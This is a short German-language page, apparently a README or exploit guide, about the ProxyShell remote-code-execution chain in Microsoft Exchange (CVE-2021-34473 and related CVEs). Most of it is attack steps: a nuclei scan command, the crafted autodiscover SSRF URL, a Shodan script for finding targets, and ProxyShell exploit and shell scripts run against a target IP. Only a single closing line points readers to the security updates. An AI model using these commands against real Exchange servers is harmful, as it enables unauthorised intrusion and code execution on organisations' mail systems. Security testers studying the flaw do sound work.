
CVE-2021-34473 Sicherheitslücke für Remotecodeausführung in Microsoft Exchange Server
CVE-2021-34473 Microsoft Exchange Server Sicherheitslücke für Remotecodeausführung. Diese fehlerhafte URL-Normalisierung ermöglicht es uns, auf eine beliebige Backend-URL zuzugreifen, während wir als Exchange Server-Maschinenkonto laufen. Obwohl dieser Fehler nicht so mächtig ist wie der SSRF in ProxyLogon und wir nur den Pfadteil der URL manipulieren konnten, ist er dennoch mächtig genug, um weitere Angriffe mit beliebigem Backend-Zugriff durchzuführen.
nuclei Scanner für Proxyshell RCE (CVE-2021-34423,CVE-2021-34473,CVE-2021-31207) entdeckt von orange tsai bei Pwn2Own, der Microsoft Exchange Server betrifft.
nuclei -u target.com -t proxyshell.yaml
https://xxx.xxx.xxx.xxx/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]
sudo python3 shodan-query.py
sudo python3 ProxyShell.py -u https://<IP>
python2 /manual/check.py
sudo python3 /manual/proxyshell.py
python2 /manual/shell.py
Wenden Sie die hier gefundenen Sicherheitsupdates an: CVE-2021-34473